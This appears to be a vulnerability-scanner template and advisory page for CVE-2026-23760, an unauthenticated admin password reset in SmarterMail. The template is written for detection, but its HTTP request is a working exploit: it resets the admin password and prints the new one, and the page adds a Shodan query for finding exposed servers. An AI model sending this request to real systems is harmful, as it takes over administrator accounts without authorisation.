SmarterTools SmarterMail - Admin Password Reset
CVE-2026-23760
Verified
Description
Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
Severity
Critical
Published Date
January 22, 2026
Template Author
watchtowr, dhiyaneshdk
CVE-2026-23760.yaml
id: CVE-2026-23760
info:
name: SmarterTools SmarterMail - Admin Password Reset
author: watchTowr,DhiyaneshDk
severity: critical
description: |
Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
impact: |
Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.
remediation: |
Upgrade to build 9511 or later.
reference:
- https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
metadata:
verified: true
max-request: 1
shodan-query: html:"SmarterMail"
tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev,kev
variables:
password: "{{rand_text_alphanumeric(12)}}"
http:
- raw:
- |
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"{{password}}",
"ConfirmPassword": "{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- 'debugInfo'
condition: and
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"New Password: " + password'
# digest: 4a0a00473045022075bc7a151ad673dcb658ce533235d67c2ed4910dd7c7b346be8535b6003e35f20221008669e4d8d1250dbbe0ffbb7b727bf10329de1163fc4c76ff4546665575bf303c:922c64590222798bb761d5b6d8e729509.5Severity
CVSS Metrics
Remediation Steps
Upgrade to build 9511 or later.